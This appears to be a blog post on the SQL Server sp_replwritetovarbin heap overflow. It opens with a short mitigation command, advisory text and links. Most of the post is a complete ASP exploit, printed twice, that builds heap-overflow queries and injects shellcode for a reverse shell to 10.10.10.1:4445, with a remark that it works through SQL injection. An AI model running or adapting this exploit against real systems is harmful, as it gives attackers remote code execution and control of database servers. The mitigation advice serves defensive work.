There is code available to take advantage of the sp_replwritetovarbin heap overflow bug
In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. To disable this proc you can run this as an admin on the box
Before disabling this pro read BradC’s comment so that you do not break replication

T-SQL
1
execute master.dbo.sp_dropextendedproc 'sp_replwritetovarbin'
execute master.dbo.sp_dropextendedproc 'sp_replwritetovarbin'

Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue.

Here are some more links
http://www.microsoft.com/technet/security/advisory/961040.mspx
http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx

Here is the code someone emailed me to test for the exploit

Visual Basic
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
// k`sOSe 12/17/2008
<%// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots 🙂
// 
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.
 
// Take a look at the comments in T-SQL
 
 
 
On Error Resume Next
 
// change this
UserName = "r00t"
Password = "t00r"
 
// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000),             "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 3020                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* First byte overwritten here. This is a random writable address */  "&_
"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
 
 
 
// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000),                "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 3097                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* Second byte overwritten here */            "&_
"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
 
 
 
// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000),                "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 3021                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* Third byte overwritten here */             "&_
"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
 
 
 
// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000),                "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 2708                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  IF @counter = 108                        "&_
"  BEGIN                            "&_
 
 
"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */    "&_
"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_
 
 
"     /* realign code */                        "&_
"    SET @buf = @buf + CHAR(0xe1)               "&_
 
 
"     /* realign the stack */                   "&_
"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_
 
 
"     /* jump ahead */                      "&_
"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
"    SET @counter = @counter + 12               "&_
"    CONTINUE                           "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* Fourth byte overwritten here */            "&_
"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
 
 
"     /* reverse shell on 10.10.10.1:4445 */            "&_
"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)
+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)
+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)
+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)
+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)
+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)
+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)
+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)
+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)
+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)
+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)
+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)
+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)
+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)
+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)
+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)
+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)
+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)
+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)
+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)
+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)
+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)
+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)
+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)
+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)
+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)
+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)      "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")
 
phase = Request.Querystring("p")
 
if phase then
    if phase = 1 then
        rs.open SQL3, oConnection
        rs.close
        oConnection.Close
        Set oConnection = Nothing
        Response.Redirect("sql-exploit.asp?p=2")
    elseif phase = 2 then
        rs.open SQL4, oConnection
        rs.close
        oConnection.Close
        Set oConnection = Nothing
        Response.Redirect("sql-exploit.asp?p=3")
    end if
Else
    rs.open SQL, oConnection
    rs.close
    oConnection.Close
    Set oConnection = Nothing
    
    Set oConnection = Server.CreateObject("ADODB.Connection")
    oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
    Set rs = Server.CreateObject("ADODB.Recordset")
    rs.open SQL2, oConnection
    rs.close
    oConnection.Close
    Set oConnection = Nothing   
 
    Response.Redirect("sql-exploit.asp?p=1")
end if
 
 
%>
// k`sOSe 12/17/2008
<%// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots 🙂
// 
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.

// Take a look at the comments in T-SQL



On Error Resume Next

// change this
UserName = "r00t"
Password = "t00r"

// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3020						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* First byte overwritten here. This is a random writable address */	"&_
"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							





// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3097						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* Second byte overwritten here */			"&_
"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							





// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3021						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* Third byte overwritten here */				"&_
"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							





// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 2708						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  IF @counter = 108						"&_
"  BEGIN							"&_


"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */	"&_
"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_


"     /* realign code */						"&_
"    SET @buf = @buf + CHAR(0xe1)				"&_


"     /* realign the stack */					"&_
"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc)	"&_


"     /* jump ahead */						"&_
"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
"    SET @counter = @counter + 12				"&_
"    CONTINUE							"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* Fourth byte overwritten here */			"&_
"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_


"     /* reverse shell on 10.10.10.1:4445 */			"&_
"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)
+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)
+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)
+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)
+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)
+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)
+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)
+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)
+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)
+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)
+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)
+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)
+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)
+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)
+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)
+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)
+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)
+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)
+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)
+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)
+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)
+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)
+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)
+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)
+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)
+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)
+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)		"&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							


Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")

phase = Request.Querystring("p")

if phase then
	if phase = 1 then
		rs.open SQL3, oConnection
		rs.close
		oConnection.Close
		Set oConnection = Nothing
		Response.Redirect("sql-exploit.asp?p=2")
	elseif phase = 2 then
		rs.open SQL4, oConnection
		rs.close
		oConnection.Close
		Set oConnection = Nothing
		Response.Redirect("sql-exploit.asp?p=3")
	end if
Else
	rs.open SQL, oConnection
	rs.close
	oConnection.Close
	Set oConnection = Nothing
	
	Set oConnection = Server.CreateObject("ADODB.Connection")
	oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
	Set rs = Server.CreateObject("ADODB.Recordset")
	rs.open SQL2, oConnection
	rs.close
	oConnection.Close
	Set oConnection = Nothing	

	Response.Redirect("sql-exploit.asp?p=1")
end if


%>